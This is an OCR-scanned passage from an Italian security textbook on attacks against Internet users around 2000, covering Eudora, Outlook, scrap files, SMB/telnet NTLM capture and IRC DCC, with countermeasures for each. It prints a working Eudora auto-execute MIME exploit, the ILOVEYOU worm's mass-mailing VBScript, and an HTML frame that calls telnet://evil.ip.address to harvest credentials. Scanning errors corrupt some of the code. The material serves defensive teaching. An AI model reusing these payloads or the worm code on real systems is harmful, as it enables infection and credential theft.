e L'opzione Use Viewer di Microsoft è abilitata in Strumenti/Opzioni/Visualiz- 
zare Mail. La prima di queste opzioni è abilitata di default (contrariamente a 
ogni precedente comunicazione, l'opzione Allow Executables In HTML Con- 
tent non deve essere abilitata per essere sfruttata). 

Questa vulnerabilità deriva dalla modalità in cui Eudora inserisce i file nei messaggi 

e-mail HTML (per esempio le immagini inline). Questi sono memorizzati in una di- 

rectory speciale, detta “cartella intercalata”. L'e-mail HTML può successivamente far 

riferimento a questi file utilizzando il loro CID (Content 1D) di MIME come parte di 

URL con il tag “cid:content-id”. 

Quindi, se un hacker crea un messaggio e-mail HTML, con due allegati intercalati 

nel messaggio e con un unico riferimento al CID di uno dei due allegati nel corpo 

del messaggio, questi possono essere eseguiti sul sistema del client. Il riferimento 
inline chiama il primo allegato HTML, che contiene il codice JavaScript, che istanzia 

il secondo come un oggetto ActiveX e lo esegue. 
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Il seguente codice dimostrativo preso dal sito http://www.malware.com/you!DO- 
RA.txt illustra la vulnerabilità (per brevità se ne è editato solo il contenuto codifica- 
to a Base64): 


MIME-Version: 1.0 

To: hapless@victim.com 

Subject: YOUIDORA 

Content-Type: multipart/related; 
boundary=" -CF416DC77A62458520258885" 


-CF416DC77A62458520258885 
Content-Type: text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 


<!doctype html public "-//w3c//dtd html 3.,2//en"> 
<htm1> 

<head> 

<title>YOU!DORA</title> 

</head> 


<body bgcolor="#0000ff" text="#000000" link="#0000ff" 

vlink="#800080" alink="#ff0000"> 

<br> 

<br> 

<img SRC="cid:mr.malware.to.you" style="display:none"> 

<img id=W0W srce="cid:malware.com" style="display:none"> 
<center><h6>YOU!DORA</h6></center> 

<IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME> 


<script> 
// 18.03.01 http://www.malware.com 
malware. location.href=W0W.src 
</script> 
</body> 
</html> 


-CF416DC77A62458520258885 

Content-Type: application/octet-stream 

Content-ID: <mr.malware.to.you> 
Content-Transfer-Encoding: base64 
Content-Disposition: inline; filename="malware.exe" 
[base64-encoded attachment "malware.exe"] 
-CF4160C77A62458520258885 

Content-Type: application/octet-stream; charset=iso-8859-1 
Content-ID: <malware.com> 

Content-Transfer-Encoding: base64 
Content-Disposition: inline; filename="You!DORA.html" 


[base64-encoded attachment "You!DORA.html"] 
-CF4160DC77A62458520258885 - - 


Quando il client di Fudora riceve questo messaggio, trasferisce i due file You!DO- 
RA.html e malware. exe nella cartella intercalata: questo è il modo consueto in cui 
si comportano gli allegati inline MIME. Il file JavaScript location.href nel corpo 
del messaggio successivamente chiama il Content ID di You!DORA. html, il quale, in 
cambio, esegue, tramite l’intercalato JavaScript, malware. exe all'interno del suo co- 
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dice HTML. Sebbene il contenuto del file sia codificato in Base 64 nel messaggio 
originale, l'aspetto di You! DORA.htm1l in ASCII è il seguente: 


<script> 

i/ http://ww.malware.com - 18.03.01 
document.writeln('<IFRAME ID=runnerwin WIDTH=0 HEIGHT=0 
sRC="about:blank"></IFRAME>'); 

function linkit(filename) 


{ 
strpagestart = "<HTML><HEAD></HEAD><BODY><OBJECT — CLASSID=" + 
"'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A' CODEBASE='"; 
strpageend = "'></OBJECT></BODY></HTML>"; 
runnerwin.document.open(); 
runnerwin.document.write(strpagestart + filename + strpageend); 


} 
linkit('malware.exe'); 
</script> 


Come si può ben vedere, il file malware. exe viene eseguito automaticamente per 
mezzo della routine “linkit”, la quale inserisce il nome del file nel contenuto HTML 
e lo riversa nel IFRAME (ulteriori informazioni sull'esecuzione automatica dei file at- 
traverso la connessione all’ipertesto, tra cui il codice campione su cui si basa, pos- 
sono essere trovate in KB Articolo Q232077 all'indirizzo http://support.micro- 
soft.com/default.aspx?scid=KB;en-us;q232077). 

L'ultimo risultato è l'esecuzione trasparente e automatica di malware .exe con nes- 
sun intervento dell’utente, semplicemente per mezzo dell’anteprima del messaggio 
cli mail in entrata. malware. exe esegue una shell di comando a tutto schermo ac- 
compagnata da un'immagine (di fiamme attizzate). 


DÌ Contromisure all’allegato nascosto di Eudora 


La migliore contromisura per questo problema è probabilmente l'aggiornamento 
a Eudora 5.1, disponibile per il download gratuito dal sito http://www. eudo - 
ra.com. Una soluzione è la disattivazione dell'opzione Use Viewer di Microsoft 
in Strumenti/Opzioni/Visualizzare Mail. Anche disabilitando JavaScript e Acti- 
veX dentro IE indebolirebbe questo attacco. Questa vulnerabilità è catalogata 
come ID 2490 Bugtraq al sito http://www.securityfocus.com/bid/2490. 


Worm che attaccano la rubrica di Outlook 


Negli ultimi anni del ventesimo secolo i grandi ideatori di codice maligno di tutto il 
mondo decisero di divertirsi alle spalle degli utenti di Outlook e Outlook Express e 
rilasciarono una marea di worm basati su un’elegante tecnica di autopropagazione: 
inviandosi a ogni voce presente nella rubrica personale di ciascuna vittima, il worm 
dissimulava la propria origine sotto le vesti di un mittente conosciuto, Questo pic- 
colo esempio di tecnica di persuasione (Capitolo 14) fu un vero colpo di genio. Le 
aziende con decine di migliaia di utenti Outlook furono costrette a chiudere i mail 
server per cercare di far fronte all’influsso dei messaggi che continuavano a rimbal- 
zare da un utente all’altro, affollando le caselle di posta e mettendo a dura prova lo 
spazio su disco dei mail server. Chi poteva resistere alla tentazione di aprire allegati 
provenienti da un mittente conosciuto e affidabile? 
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Il primo missile di questo tipo diffuso tramite posta elettronica si chiamava Melissa, 
e sebbene il suo presunto autore David L. Smith fosse stato arrestato e alla fine di- 
chiarato colpevole in secondo grado di crimine informatico con una condanna da 
cinque a dieci anni di reclusione e un'ammenda fino a 150.000 dollari, gli hacker 
continuarono a diffondere le loro creazioni per anni. Nomi come Worm.Explo- 
re.Zip, BubbleBoy e ILOVEYOU si diffusero a macchia d’olio fin quando i mass me- 
dia sembrarono stancarsi di dare grande rilievo a questi attacchi verso la fine del 
2000. La minaccia comunque persiste e deve essere senza dubbio presa in conside- 
razione. 


C) Worm ILOVEYOU 


Diffusione: 5 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 7 


Ecco la subroutine in linguaggio VBScript ( Visual Basic Script) tratta dal worm ILO- 
VEYOU che provocava la sua diffusione tramite posta elettronica (alcune righe 
sono state spezzate manualmente per adattarle alla pagina): 


sub spreadtoemail() 

On Error Resume Next 

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad 

set regedit=Create0Object("WScript.Shell") 

set out=WScript.CreateObject("Outlook.Application") 

set mapi=out.GetNameSpace("MAPI") 

for ctrlists=1 to mapi.AddressLists.Count 

set a=mapi.AddressLists(ctrlists) 

x=1 

regv=regedit.RegRead("HKEY CURRENT_USER\Software\Microsoft\WAB\"&a) 

if (regv="") then 

regv=1 

end if 

if (int(a.AddressEntries.Count)>int(regv)) then 

for ctrentries=1 to a.AddressEntries.Count 

malead=a.AddressEntries(x) 

regad="" 

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) 

if (regad="") then 

set male=out.CreateItem(0) 

male.Recipients.Add(malead) 

male.Subject = "ILOVEYOU" 

male.Body = vberlf&"kindly check the attached LOVELETTER coming from me." 

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 

male .Send 

regedit.RegWrite "HKEY_ CURRENT_USER\Software 
\Microsoft\WAB\"&malead,1,"REG_DWORD" 

end if 

x=Xx+1 

next 

regedit.RegWrite 

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count 

else 
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regedit.RegWrite 
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count 
end if 

next 

Set out=Nothing 

Set mapi=Nothing 

end sub 


Questa semplice routine di 37 righe richiama la MAPI (Messaging Application 
Programming Interface) per scandagliare il WAB (Windows Address Book) del 
Registro di sistema e crea un elemento di posta con l’oggetto “ILOVEYOU” e la 
frase “kindly check the attached LOVELETTER coming from me” nel corpo del 
messaggio per ogni destinatario trovato (ringraziamo Brian Lewis di Foundstone 
Inc. per l’aiuto fornito nell'analisi del codice). Nel caso che tra i lettori vi sia 
qualche non programmatore convinto che questa sia scienza di livello spaziale, 
lasciateci rammentare che ILOVEYOU si basava su una tesi accademica scritta 
da uno studente universitario di ventitré anni. Chi può sapere quanti danni 
avrebbe potuto provocare? 


Come fermare i worm che attaccano la rubrica 


Dopo anni di attacchi da parte dei mass media, Microsoft si è stancata di sottolineare 
che i principali responsabili dell’avvio di allegati contenenti questo tipo di worm sono 
gli utenti e ha rilasciato una patch, denominata Outlook 2000 SR-1 E-mail Security 
Update (http://office.microsoft.com/downloads/2000/0ut2ksec.aspx). Una ca- 
ratteristica di questa soluzione trivalente era l’Object Model Guard, progettato per avvi- 
sare l'utente ogniqualvolta un programma esterno cercava di accedere alla rubrica di 
Outlook o di inviare posta elettronica per conto dell'utente. 

RSTCorp (Retiable Software Technologies Corporation, ora Cigital, http://ww.ci- 
gital.com) ha rilasciato un'utility aggiuntiva che ferma determinate chiamate a 
Outlook monitorando il Virtual Basic Scripting Engine e pertanto interrompendo la 
diffusione di virus come ILOVEYOU. Questa patch, chiamata JBF (JustBeFrien- 
ds.dlD, può essere utilizzata in combinazione con l'aggiornamento di Microsoft per 
Out-look. Al contrario dell’Object Model Guard di Microsoft, che funziona control 
lando l’accesso alle funzioni interne a Outlook che possono essere utilizzate per 
raccogliere indirizzi di posta elettronica o inviare messaggi, JBF “funziona control- 
lando la capacità di altre applicazioni di accedere a Outlook o Outlook Express. Nel 
caso in cui l’accesso provenga da uno script eseguito dal desktop o da un allegato, 
esso viene negato, mentre in caso contrario all’utente viene chiesto di confermare 
che l'applicazione può accedere ad Outlook” (come descritto dai Technical Details 
on JBF alla pagina http://ww.cigital.com/jbf/tech.html). 

Cigital sostiene che il suo approccio è superiore, dal momento che l’Object Model 
Guard di Microsoft deve proteggere un notevole elenco di oggetti per poter avere 
successo, un compito decisamente impegnativo. Essi inoltre osservano che gli indi- 
rizzi di posta elettronica possono sempre essere esposti nel caso in cui appaiano 
nelle firme, nel corpo dei messaggi o in altri documenti e che “è probabile che in 
futuro verranno individuati nuovi metodi volti a sfruttare i difetti di Outlook per in- 
viare posta elettronica”. Sbarrando l’accesso a Outlook/OE da parte degli script, JBF 
in teoria è in grado di prevenire nuovi attacchi basati su un’ampia gamma di tecni- 
che di attacco correlate. 
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JustBeFriends è disponibile all’indirizzo http://ww.cigital.com/jbf/. Lo con- 
sigliamo agli utenti di Outlook/OE su piattaforme NT/2000. 


9) JustBeFriends non funziona sulle piattaforme Win 9x. 


Attacchi tramite allegati 


Una delle caratteristiche più utili della posta elettronica è la capacità di allegare file 
ai messaggi. Questa grande opportunità di risparmiare tempo presenta tuttavia ovvi 
svantaggi, in particolare legati all'inguaribile tendenza degli utenti a eseguire qua- 
lunque file ricevuto tramite posta elettronica: nessuno sembra rendersi conto che 
ciò equivale a invitare i malintenzionati direttamente nel proprio salotto di casa. 

Di seguito analizzeremo diversi attacchi che si basano su file allegati a messaggi di 
posta elettronica, molti dei quali ruotano attorno a meccanismi per nascondere la 
natura del file allegato o per renderlo irresistibilmente invitante e costringere quindi 
l'utente a fare il fatidico clic con il mouse. Esamineremo tuttavia altre forme di attac- 
co molto più insidiose che scrivono i file allegati direttamente sul disco senza alcun 
intervento o consapevolezza da parte dell'utente. La maggior parte degli utenti In- 
ternet sa che gli allegati ai messaggi di posta elettronica devono essere maneggiati 
con estrema prudenza e grande scetticismo. Speriamo quindi che quanto diremo 
serva a rinforzare al massimo questo concetto. 


® Attacchi tramite file scrap allegati 


Diffusione: D 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 7 


Uno dei segreti meno noti di Windows è che, nel caso di file con estensione .shs, 
l'estensione vera e propria viene nascosta di default in base all'impostazione del Re- 
gistro di sistema HK£Y_CLASSES_ROOT\ShellScrap\NeverShowExt. Questo proba- 
bilmente non sarebbe un grande problema, se non fosse che i file .shs, noti anche 
come file scrap o oggetti scrap della shell (Shell Scrap Objects), possono ese-guire 
comandi: in base alla tecnologia OLE (Object Linking and Embedding) ana-lizzata 
nel paragrafo relativo ad ActiveX, i file scrap sono sostanzialmente wrapper per altri 
oggetti incorporati, che possono essere fogli di lavoro Excel (che alla maggior parte 
degli utenti capita di vedere incorporati in documenti Word) o altri file. Il modo più 
semplice per crearne uno è incorporare un file in un’altra applicazione compatibile 
OLE (provate con Wordpad) e poi copiare la sua icona in un’altra cartella: il file a 
questo punto è contenuto nel proprio file wrapper, con la propria icona speciale e 
un'estensione esclusiva (.shs). Quando il file SHS viene avviato, è eseguito anche 
l'oggetto incorporato. Ma c’è dell'altro, perché è possibile associare comandi all’og- 
getto incorporato tramite l’Object Packager di Microsoft, il che spalanca un vasto 
orizzonte di potenziali attività dolose a chiunque abbia anche solo una discreta fa- 
miliarità con il DOS. 

Nel giugno del 2000 qualcuno lanciò un worm chiamato LifeChanges che sfruttava 
proprio queste caratteristiche dei file scrap per attaccare gli utenti. Il worm veniva tra- 
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smesso tramite messaggi di posta elettronica con una riga di oggetto variabile che fa- 
ceva riferimento a barzellette contenute nel file allegato, che era un file scrap con una 
falsa estensione txt che lo rendeva simile a un comune file di testo (anche l'icona pre- 
definita dei file scrap è come quella dei file di testo). Una volta eseguito, LifeChanges 
svolgeva le consuete attività: si replicava inviandosi ai primi cinquanta indirizzi pre- 
senti nella rubrica della vittima, cancellava file e così via. È stato stupefacente vedere 
che qualcuno aveva potuto sferrare un attacco basato in modo lampante sulle caratte- 
ristiche pericolose dei file scrap che erano note da anni e descritte in modo molto di- 
vertente sul sito Web PCHelp (http://ww.pc-help.org/security/scrap.htm). 
Chissà quante altre mine vaganti come questa sono in attesa pronte a esplodere nel 
Registro di sistema di Windows! 


© Contromisure ai file scrap 


Su PCHelp potete trovare alcuni ottimi consigli per attutire gli aspetti più pericolosi 

dei file scrap, tra cui citiamo i seguenti. 

e Cancellate il valore NeverShowExt del Registro di sistema citato in prece- 
denza e da HKLM\SOFTWAREX\Classes\DocShortcut, rendendo in tal modo 
visibili le estensioni .shs e .shb in Windows (i file .SHB hanno un comporta- 
mento analogo ai file .SHS). 

e Aggiornate i programmi antivirus in modo che cerchino i file .SHS e .SHB 
oltre agli altri tipi di file eseguibili. 

e  Disabilitate completamente i file scrap rimuovendoli dall’elenco di file 
conosciuti di Windows oppure cancellando il file shscrap.dll dalla cartel- 
la System. 

e Non servitevi di Windows Explorer ma utilizzate il vecchio File Manager 
(winfile.exe su NT 4). 


C) Nascondere l’estensione degli allegati 
alla posta elettronica inserendo molti spazi 


Diffusione: VA 
Semplicità: 8 
Impatto: GI 
Fattore di rischio: 8 


In un messaggio alla mailing list Incidents (URL) del 18 maggio 2000 (si veda 
http://www.securityfocus.com/archive/75/60687), Volker Werth segnalò un 
metodo per inviare allegati di posta elettronica cha nascondevano in modo intel- 
ligente il nome del file allegato. Riempiendo di spazi il nome del file (%20 in 
esadecimale), i programmi di lettura della posta possono essere costretti a visua- 
lizzare solo i primi caratteri del nome dell’allegato nell’interfaccia utente. Per 
esempio: 


freemp3.doc > cats FIBO.EpRAZi] 5 + . exe 


Questo allegato appare come freemp3.doc nell'interfaccia utente, un file dall’aspet- 
to perfettamente legittimo che potrebbe essere salvato su disco o avviato diretta- 
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mente dal programma di posta. La figura seguente mostra come appare in Outlook 
Express. 


WI Posta in arrivo - Outlook Express 


Outlook Express 6 


©) Tsam di Microsoft Outlook Express 


far] Outicok Express 
3) Cartelle locali A mallory@attacker.net Leggi questo messaggio!! 
@ Posta in arrivo EA mallory@attacker.net Overflow della data! ! 
D Posta in uscita A mallory@attacker.net Un bel file allagato! 
SÉ Posta inviata allor vMattacker.ne I file allagato! 
(1°) Posta eliminata 
(3) Bozze 
a ® msnews.microsaft.c 
@ microsoft.puti 
Ecco il file MP3 che mi vevi chiesto 
(See attached file: freemp3 doc) 
I zl 
Apre l'allegato “Freemp3.doc (19,5 XE)". î TERE ZA 


Contromisure agli allegati con estensione nascosta 


Come potete notare dall’icona che appare nella figura precedente, l'allegato non è 
certamente un documento Word. Anche i puntini di sospensione finali aiutano a 
confermare i sospetti. E se anche questi indizi non fossero sufficienti, non dovreste 
comunque aprire gli allegati direttamente dai messaggi! La patch alla sicurezza di 
Outlook SR-1 può essere di aiuto con questi problemi, poiché obbliga l'utente a sal- 
vare su disco i file allegati più pericolosi (fate riferimento a http://office.micro- 
soft.com/downloads/2000/0ut2ksec.aspx). 


sbie 


® ; ‘ $ 
#) Tecniche per convincere a scaricare un allegato 


Diffusione: 10 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 10 


L'approccio diretto che porta a salvare su disco un allegato è la persuasione. Non vi 
è mai capitato di trovare il seguente testo nel corpo di un messaggio di posta elet- 
tronica? 
“This message uses a character set that is not supported by the Internet Ser- 
vice. To view the original message content, open the attached message. If 
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the text doesn't display correctly, save the attachment to disk, and then 
open it using a viewer that can display the original character set.” 
(Questo messaggio utilizza un set di caratteri non supportato dal servizio 
Internet: per vedere il contenuto originale del messaggio, aprite il messag- 
gio allegato. Se il testo non viene visualizzato correttamente, salvate l’alle- 
gato su disco e poi apritelo con un viewer in grado di visualizzare il set di 
caratteri originale.) 
Questo è un messaggio standard creato quando i messaggi di posta elettronica (in 
formato .EML) vengono inoltrati agli utenti Outlook e si verifica qualche errore nella 
gestione MIME del messaggio incluso/inoltrato. Ci sorprende che questa sia una 
tecnica quasi irresistibile per convincere qualcuno a eseguire un allegato (sia diret- 
tamente sia dopo averlo salvato su disco). È capitato anche a noi di ricevere mes- 
saggi di questo tipo provenienti da listserver di mailing list sulla sicurezza molto fa- 
mose! Ovviamente questo è solo un esempio dell’illimitata gamma di possibili testi 
che un hacker potrebbe inserire nel corpo o nel campo dell'oggetto di un messag- 
gio. Non fatevi ingannare! 


D) Contromisure alle forme 
di violazione per scaricare gli allegati 


Qui l’unico nemico è il dito posizionato sul mouse: insegnategli ad avere pazienza e 
controllate gli allegati scaricati con un software antivirus prima di eseguirli; inoltre, 
controllate attentamente il mittente del messaggio prima di decidere di avviare, e 
sappiate che alcuni worm come ILOVEYOU possono assumere l’identità dei vostri 
amici più fidati. 


Scrittura di allegati su disco senza intervento dell’utente 


Fino a questo punto abbiamo parlato di diversi meccanismi per l'esecuzione di file 
che potrebbero risiedere sul disco dell’utente remoto; gli attacchi elencati finora in 
genere contavano su eseguibili esistenti (sul server remoto o sul disco locale 
dell'utente) per svolgere le loro attività dolose. Cosa accadrebbe se un hacker aves- 
se la capacità di scrivere file sul disco della vittima? Questo rappresenterebbe un 
metodo perfetto per recapitare un pacchetto dati minatorio e poi farlo esplodere a 
distanza. 


® Intercettazione della funzione 
Salva con nome di Excel/PowerPoint 


Diffusione: 5 
Semplicità: DI 
Impatto: 8 
Fattore di rischio: 6 


A fondamento di questo attacco possiamo trovare l'osservazione di Georgi Gunin- 
ski che Microsoft Excel e PowerPoint hanno una funzione Salva con nome (http: 
//www.guninski.com/sheetex-desc.html) e che pertanto, una volta chiamato un 
documento Office in Internet Explorer con il tag OBJECT (come abbiamo visto in 
precedenza), esso offre la capacità di salvare dati in una posizione arbitraria sul di- 
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che SMBCapture sia ascoltato su attacker_server o sul suo segmento di rete lo- 
cale, verrà riversato il traffico NTLM di richiesta di chiarificazione. 

Una variazione a questo attacco consiste nell'impostare un server SMB falso per cat- 
turare gli hash, oltre che uno sniffer quale SMBCapture. Nel Capitolo 6 abbiamo 
parlato dei server SMB falsi, che possono catturare hash o addirittura registrarsi nel- 
la macchina della vittima servendosi delle credenziali rubate. 


Contromisure alla redirezione SMB 


Il rischio presentato dagli attacchi di redirezione SMB può essere ridotto in diverse 
maniere. 

Una consiste nel garantire che vengano seguite le maggiori pratiche di sicurezza 
della rete. Ponete i servizi SMB in reti protette: limitate strettamente il traffico in 
uscita ai limiti dei firewall e assicuratevi che l'infrastruttura della rete complessiva 
non permetta al traffico SMB di passare attraverso nodi non sicuri. Una conseguen- 
za logica di questo rimedio è assicurarsi che punti di accesso fisici alla rete (spine a 
muro ecc.) non siano esposti al passaggio anche casuale di estranei (ricordatevi che 
ciò è reso più difficoltoso dal crescente prevalere di reti a connessione wireless). 
Oltre a questo, sebbene sia in genere una buona idea utilizzare caratteristiche incor- 
porate nell’attrezzatura di rete o DHCP per prevenire intrusioni da registrazioni fisi- 
che e da indirizzi di livello rete senza la vostra autenticazione, vi rendete conto che 
gli attacchi di sniffing non richiedono all’hacker di ottenere un indirizzo MAC o IP. 
Loro operano in modo indiscriminato. 

Poi configurate tutti i sistemi Windows all’interno del vostro ambiente per disattiva- 
re la diffusione degli hash LM e NTLM online. Questo risultato viene raggiunto uti- 
lizzando l’impostazione LAN Manager Authentication Level (vedi Capitoli 5 e 6). 

La migliore difesa per questo attacco è richiedere SMB Packet Signing sulla vostra 
macchina. Ogni sessione che viene intercettata nel modo precedente non sarà in 
grado di riconnettersi alla vostra casella con questa impostazione abilitata (è nel 
Group Policy Security Settings in Windows 2000). 


È) Raccolta di credenziali NTLM con telnet:// 


Diffusione: 4 
Semplicità: 9 
Impatto: E 
Fattore di rischio: 7 


Come se l'URL file:// non fosse già abbastanza spiacevole, il client Internet di Micro- 
soft esegue automaticamente l’analisi dell’URL telnet://server e apre una connessio- 
ne al server. Questo permette anche a un hacker di creare un messaggio e-mail 
HTML che forza un’autenticazione in uscita sopra ogni porta: 


<html> 

<frameset rows="100%,*"> 

<frame srce=about:blank> 

<frame sre=telnet://evil.ip.address:port> 
</frameset> 

</html> 
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Normalmente questo non riveste particolare importanza eccetto che per Win 2000, 
il client di telnet incorporato è impostato per utilizzare l'autenticazione NTLM di de- 
fault. Quindi in risposta al precedente HTML, un sistema Win 2000 cercherà con 
successo di registrare in evi/.ip.address servendosi del meccanismo standard di ri- 
chiesta di chiarificazione NTLM. Questo meccanismo, come abbiamo visto nel Capi- 
tolo 5, può esporsi ad attacchi spia e MITM (Man-Mn-The-Middle) che rivelano il 
nome utente e la password della vittima. 

Questo attacco riguarda una moltitudine di parser HTML e non fa affidamento su al- 
cun modulo di Active Scripting o JavaScript. Quindi nessuna configurazione IE può 
evitare questo comportamento. Il riconoscimento spetta a DilDog del famoso Back 
Orifice che invia questo attacco a Bugtraq. 


Contromisure agli attacchi telnet:// 


Le migliori pratiche di sicurezza della rete dicono che il traffico di autenticazione 
NTLM in uscita deve essere bloccato al perimetro del firewall. Tuttavia questo attac- 
co produce credenziali NTLM che devono essere inviate sul protocollo telnet. Assi- 
curatevi anche di bloccare telnet in uscita al perimetro della porta. 

AI livello di host, configurate il client telnet di Win 2000 in modo che esso non utiliz- 
zi l'autenticazione NTLM. Per fare questo eseguite telnet all'invio del prompt dei co- 
mandi, digitate unset ntlm e poi uscite da telnet per salvare i vostri preferiti nel Re- 
gistro di sistema. Microsoft ha anche fornito una patch in MS00-067 che presenta un 
messaggio di allerta per l'utente prima di inviare automaticamente le credenziali 
NTLM a un server che risiede in una zona pericolosa (MS00-067 può essere trovato al 
sito http://www.microsoft.com/technet/treeview/default.asp?url=technet/ 
security/bulletin/MS00-067.asp). Questo è stato anche stabilito in Window 2000 
SP2. Questa vulnerabilità è catalogata come Bugtraq ID 1683 (http:// ww. securi- 
tyfocus.com/bid/1683). 

È anche il caso di aggiungere che l'impostazione LAN Manager Authentication Level 
in Security Policy può rendere molto difficile estrarre le credenziali dell'utente dagli 
scambi di richiesta di chiarificazione NTLM, come illustrato nel Capitolo 5. Impo- 
standolo a inviare solo NTLMv2 Response o successivi può ridurre il rischio di 
un’esposizione agli attacchi spia LM/NTLM (questo presuppone la disponibilità li- 
mitata di programmi che estrarranno gli hash dal traffico NTLMv2). Gli attacchi del 
server falso e MITM contro l'autenticazione NTLMv2 sono ancora fattibili, assumen- 
do che il server falso/MITM possa negoziare NTLMv2 con il server a vantaggio del 
client. 


Hacking di IRC 


IRC (Internet Relay Chat) rimane una delle applicazioni più utilizzate su Internet, a 
causa non solo della gratificazione immediata della comunicazione in tempo reale, 
ma anche della capacità di scambiare istantaneamente file con i client IRC più mo- 
derni. Ma è proprio da qui che nascono i problemi. 

I neofiti di IRC spesso sono confusi dalla frequente offerta di file da parte dei parte- 
cipanti di un canale: molti sono abbastanza prudenti da rifiutare le offerte prove- 
nienti dai totali sconosciuti, tuttavia la natura stessa di IRC tende a far sì che questa 
formalità svanisca rapidamente. Un parente di uno degli autori è stato ingannato da 
uno stratagemma di questo genere, un semplice file batch che ha formattato il suo 
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disco fisso. Come nel caso degli allegati innocui ai messaggi di posta elettronica, 
tuttavia, il problema è spesso più insidioso, come vedremo tra breve, 


Nu 


® Attacchi con file inviati tramite DCC 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Questo tipo di attacco è stato oggetto di un interessante thread sulla mailing list 
Incidents gestita da Security Focus (http://ww.securityfocus.com; cercate 
INCIDENTS Digest dal 10 luglio 2000 all’11 luglio 2000, #2000-131). A un utente cu- 
rioso era stato offerto un file tramite DCC (su IRC viene utilizzato un metodo chia- 
mato DCC Send e DCC Get per connettersi direttamente a un altro client IRC per in- 
viare e prelevare file, invece di passare attraverso la rete IRC). Il file si chiamava 
LIFE_STAGES.TXT (dove l'abbiamo già visto? Suggerimento: riguardate nel paragra- 
fo dedicato ai file scrap di Windows come allegati). Non poteva trattarsi che di un 
evidente tentativo di provocare danni sul sistema dell'utente, oppure di un attacco 
automatico inviato da un client IRC compromesso all'insaputa dell’utente. 

Questa è una delle caratteristiche di IRC che disarma rapidamente i nuovi utenti: i 
client IRC che sono stati compromessi da un worm possono incorporarsi nelle rou- 
tine automatizzate degli script del client, collegandosi automaticamente tramite 
DCC a chiunque si unisca a un canale senza che l'utente al terminale ne sappia 
qualcosa. 

Inoltre è probabile che il worm analizzato nel thread di Incidents fosse configurato 
in modo da impostare l'opzione per ignorare automaticamente le proposte dei più 
noti antivirus quando si univa a determinati canali. Tali worm inoltre ignorano auto- 
maticamente le persone che scrivono al client utilizzando termini come “infected”, 
“lifestages”, “remove”, “virus”. Può quindi trascorrere molto tempo prima che l’uten- 
te infetto possa essere avvisato del problema senza che venga innescata la funzione 
che ignora automaticamente i messaggi. 


© Contromisure per DCC 


Fortunatamente, il comportamento predefinito della maggior parte dei client IRC 
prevede che i file prelevati tramite DCC vengano memorizzati in una directory di 
download specificata dall'utente, che pertanto deve spostarsi verso di essa e avviare 
manualmente il file. 

Come gli allegati ai messaggi di posta elettronica, anche i file ricevuti tramite DCC 
devono essere considerati con molto scetticismo. Oltre ai soliti sospetti (i file .BAT, 
«COM, .EXE, .VBS e .DLL), guardatevi dai documenti Microsoft Office che possono 
contenere macro dannose, così come dagli Alias, Popup o Script per l'automazione 
del client IRC che possono assumere il controllo del client: consigliamo vivamente 
l'impiego di un programma di scansione antivirus per questi file. 

Il tentativo di rintracciare gli utenti malintenzionati su IRC tipicamente non dà alcun 
frutto e si rivela una perdita di tempo. Come è stato messo in luce nel thread di In- 
cidents, la maggior parte degli hacker si connette a IRC con host virtuali (vhost) tra- 
mite BNC (IRC Bouncer, sostanzialmente un server proxy IRC). Pertanto il tentativo 
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di risalire a un dato indirizzo IP può rivelare non l’utente effettivamente seduto al 
terminale, ma piuttosto il server che esegue il BNC. 


Contromisure generali 
all’hacking dell’utente di Internet 


In questa parte dedicata all'hacking dell'utente Internet abbiamo analizzato moltissi- 
me tecniche a disposizione dei malintenzionati, molte delle quali ruotano attorno 
alla possibilità di ingannare l'utente, convincendolo a eseguire virus, worm e un al- 
tro codice dannoso. Abbiamo anche descritto molte soluzioni mirate per questi pro- 
blemi, ma abbiamo finora evitato l’analisi di una strategia di difesa ad ampio spettro 
contro gli attacchi di questo tipo. 


Aggiornamento delle firme dell’antivirus 


Ovviamente una difesa di questo tipo esiste ed è nota da molti anni: si chiama soft- 
ware antivirus e correte seri rischi se non ne avete uno in esecuzione sul vostro si- 
stema. Sono tantissimi i produttori tra i quali potete scegliere se cercate un software 
antivirus: Microsoft pubblica un elenco molto valido alla pagina http://support. 
microsoft.com/support/kb/articles/Q49/5/00.ASP. La maggior parte dei pro- 
dotti più noti (come Symantec Norton Antivirus, McAfee, Data Fellows, Trend Mi- 
cro, Computer Associates Inoculan/InoculatelT e simili) si comportano in modo 
analogo e sono tutti validi per tenere alla larga il codice maligno. 

L'unico svantaggio principale nel metodo impiegato dal software antivirus è che 
non offre una protezione contro i nuovi virus se non gli è stato insegnato come ri- 
conoscerli. I produttori di antivirus si affidano pertanto a meccanismi di aggiorna- 
mento che prevedono il prelevamento periodico da parte dei clienti delle nuove de- 
finizioni dei virus. Esiste pertanto una fase di maggiore vulnerabilità tra il primo rila- 
scio di un nuovo virus e il momento in cui l’utente aggiorna le definizioni dei virus. 
A patto che siate consapevoli di questa possibile vulnerabilità e che impostiate il 
software antivirus per aggiornarsi automaticamente a intervalli regolari (settimanal- 
mente dovrebbe essere sufficiente), gli strumenti antivirus offrono un altro robusto 
livello di difesa contro molti dei pericoli descritti nelle pagine precedenti. Ricordate- 
vi di abilitare le funzioni di protezione automatica del software per sfruttarne a pie- 
no tutti i vantaggi, in particolare la scansione automatica della posta elettronica e 
dei floppy. Tenete anche aggiornate le definizioni dei virus! La maggior parte dei 
produttori offre un anno gratuito di aggiornamento, ma poi richiede il rinnovo della 
sottoscrizione automatica per una piccola somma (per esempio Symantec offre uno 
di questi servizi economici che potete scaricare dal sito http://www.syman- 
tec.com/avcenter/download.html). 

Sappiate inoltre che esistono molti falsi allarmi relativi ai virus, che possono causare 
danni quanto i virus stessi. Consultate la pagina http://vmyths.com/ho- 
ax.cfm?page=0 per trovare un elenco di quelli più famosi. 


Protezione dei gateway 


Il modo più efficiente per proteggere un grande numero di utenti rimane una rigida 
strategia di difesa a livello di rete. Ovviamente occorre sfruttare al massimo i 
